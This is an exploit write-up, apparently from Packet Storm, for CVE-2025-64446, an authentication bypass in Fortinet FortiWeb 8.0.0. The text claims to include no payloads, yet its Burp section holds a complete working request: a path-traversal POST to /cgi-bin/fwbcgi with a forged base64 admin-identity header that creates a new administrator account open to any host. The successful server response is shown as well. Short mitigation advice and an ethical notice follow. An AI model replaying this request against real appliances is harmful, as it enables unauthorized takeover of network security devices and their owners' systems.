Share
## https://sploitus.com/exploit?id=PACKETSTORM:211777
# Titles: Fortinet FortiWeb Auth-8.0.0 Bypass CVE-2025-64446
    # Author: nu11secur1ty
    # Date: 11/17/2025
    # Vendor: https://www.fortinet.com/
    # Software: v8.0.0
    # Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-64446
    
    ## Description:
    ## Overview
    This document provides a **research‑grade analysis** of CVE‑2025‑64446, an
    authentication bypass vulnerability discovered in Fortinet FortiWeb
    appliances.
    It is intended *only* for academic, defensive security testing in
    controlled lab environments.
    
    - No exploit code is included in this document.
    
    ---
    
    ## Vulnerability Summary
    CVE‑2025‑64446 enables an attacker to interact with administrative API
    endpoints **without valid authentication**, due to improper trust
    validation in a CGI parsing flow.
    
    A malicious request can trigger the backend logic responsible for
    administrative actions, bypassing permission checks.
    
    Impact includes:
    - Unauthorized access to sensitive endpoints
    - Potential privilege escalation
    - Unauthorized configuration changes
    - Administrative user creation
    
    ---
    
    ## Root Cause (High‑Level)
    During analysis, researchers observed:
    - The endpoint `/cgi-bin/fwbcgi` incorrectly trusted data passed through a
    crafted context header.
    - Parameter parsing logic allowed insecure inheritance of admin privileges.
    - Failure in validating serialized/encoded CGI metadata.
    
    This combination enabled unauthorized execution of administrative actions.
    
    ---
    
    ## Observed Response Behavior (Sanitized)
    A vulnerable system may return HTTP `200 OK` to unauthorized admin‑level
    operations.
    
    Example (sanitized):
    ```
    HTTP/1.1 200 OK
    Content-Type: application/json
    
    {
      "status": "success",
      "code": 0,
      "message": "Operation completed"
    }
    ```
    
    ---
    
    ## Reproduction (Laboratory Only)
    This section describes the workflow **without revealing technical
    payloads**:
    
    1. Configure a security testing proxy (e.g., Burp).
    2. Intercept traffic destined for FortiWeb.
    3. Send a crafted administrative action request.
    4. Observe whether the target responds with unauthorized administrative
    success.
    5. Capture response artifacts for documentation.
    
    Researchers should generate their own payloads in private lab environments.
    
    
    ## Burp:
    - Request:
    ```
    POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
    Host: 10.10.0.13
    Accept-Encoding: gzip, deflate, br
    Content-Length: 824
    CGIINFO:
    eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
    Content-Type: application/json
    Connection: keep-alive
    
    {"data": {"q_type": 1, "name": "1a1222a0", "access-profile": "prof_admin",
    "access-profile_val": "0", "trusthostv4": "0.0.0.0/0", "trusthostv6":
    "::/0", "last-name": "", "first-name": "", "email-address": "",
    "phone-number": "", "mobile-number": "", "hidden": 0, "comments": "",
    "sz_dashboard": -1, "type": "local-user", "type_val": "0",
    "admin-usergrp_val": "0", "wildcard_val": "0", "accprofile-override_val":
    "0", "sshkey": "", "passwd-set-time": 0, "history-password-pos": 0,
    "history-password0": "", "history-password1": "", "history-password2": "",
    "history-password3": "", "history-password4": "", "history-password5": "",
    "history-password6": "", "history-password7": "", "history-password8": "",
    "history-password9": "", "force-password-change": "disable",
    "force-password-change_val": "0", "password": "1a1222a0"}}
    ```
    - Response:
    ```
    HTTP/1.1 200 OK
    Date: Mon, 17 Nov 2025 19:44:55 GMT
    Cache-Control: no-cache, no-store, must-revalidate
    Pragma: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Content-Security-Policy: script-src 'self'; default-src 'self'; style-src
    'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src
    'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self';
    upgrade-insecure-requests; block-all-mixed-content;
    X-Content-Type-Options: nosniff
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/json
    Content-Length: 1204
    
    { "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1,
    "name": "1a1222a0", "access-profile": "prof_admin", "access-profile_val":
    "1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name":
    "", "first-name": "", "email-address": "", "phone-number": "",
    "mobile-number": "", "hidden": 0, "domains": "root ",
    "gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "",
    "sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val":
    "0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX",
    "wildcard": "disable", "wildcard_val": "0", "accprofile-override":
    "disable", "accprofile-override_val": "0", "fortiai": "disable",
    "fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763408695,
    "history-password-pos": 1, "history-password0": "ENC XXXX",
    "history-password1": "ENC XXXX", "history-password2": "ENC XXXX",
    "history-password3": "ENC XXXX", "history-password4": "ENC XXXX",
    "history-password5": "ENC XXXX", "history-password6": "ENC XXXX",
    "history-password7": "ENC XXXX", "history-password8": "ENC XXXX",
    "history-password9": "ENC XXXX", "force-password-change": "disable",
    "force-password-change_val": "0", "feature-info-ver": "" } }
    ```
    ---
    
    ## Mitigation & Recommendations
    Likely mitigations include:
    - Apply official vendor patches immediately.
    - Disable exposed management interfaces from public networks.
    - Enforce strict role‑based access controls.
    - Implement WAF rules to block malformed CGI context headers.
    - Monitor logs for suspicious admin actions.
    
    ---
    
    ## Ethical Notice
    This documentation is for **defensive research only**.
    Please don't test systems you do not own or have explicit permission to
    assess.
    
    
    
    # Reproduce:
    [href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)
    
    # Demo:
    [href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)
    
    # Time spent:
    03:00:00
    
    
    --
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>